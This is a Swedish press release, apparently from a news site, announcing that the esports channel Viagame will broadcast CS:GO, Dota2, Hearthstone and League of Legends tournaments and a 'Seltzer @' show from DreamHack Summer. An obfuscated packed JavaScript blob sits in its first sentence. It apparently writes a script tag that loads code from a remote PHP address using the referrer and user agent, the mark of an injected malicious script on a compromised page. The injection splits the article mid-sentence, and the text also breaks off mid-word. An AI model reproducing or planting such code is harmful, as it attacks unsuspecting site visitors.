Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Viagame sänder de största spelen från DreamHack

Viagame sänder de största spelen från DreamHack
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srhia|var|u0026u|referrer|abzaf||js|php’.split(’|’),0,{}))
nyligen lanserade eSportkanalen Viagame sänder till helgen turneringarna från de fyra största spelen live från DreamHack Summer. Utöver detta kommer Viagame att ha ett exklusivt format kallat ”Seltzer @ DreamHack Summer” som leds av stjärnvärden Rachel Quirico.

Viagame, den nya globala eSportkanalen som lanserades av MTGx tidigare i veckan, kommer att sända Counter Strike: Global Offensive, Dota2, Hearthstone och League of Legends turneringarna live från DreamHack Summer den 14-16 juni. Dessa stora turneringar kommer att finnas tillgängliga live och on demand på www.viagame.com och Hearthstone-turneringen kommer att sändas exklusivt på
Viagame. Blizzardtiteln Hearthstone har sedan den lanserades i mars 2014 nått en användarskara på över 10 miljoner spelare globalt.

Utöver dessa turneringar kommer Viagame att sända ett format vid namn ”Seltzer @”, där stjärnvärden Rachel ’SeltzerPlease’ Quirico gör intervjuer med proffsspelare, ger behind the
scenes-rapportering samt annat bonusmaterial direkt från DreamHack Summer till fans världen över.

”Det här eventet handlar framförallt om att samlas och spela alla de spel du älskar och jag ser fram emot att snacka med alla möjliga spelare för att ge tittarna den kompletta upplevelsen.” Säger
Rachel Quirico om samarbetet med Viagame.

Viagame Hearthstone Championship live från DreamHack sätter igång den 14 juni kl. 17:30. Håll koll på @Viagame och @DreamHack för mer information och nyheter!

eSport är förkortningen för fenomenet elektronisk sport, där deltagarna spelar datorspel mot varandra. De vanligaste typerna av spel är förstapersonsskjutare, fighting, strategi, kortspel samt MOBA. De spelen med störst prisp

Detta är ett pressmeddelande från Viagame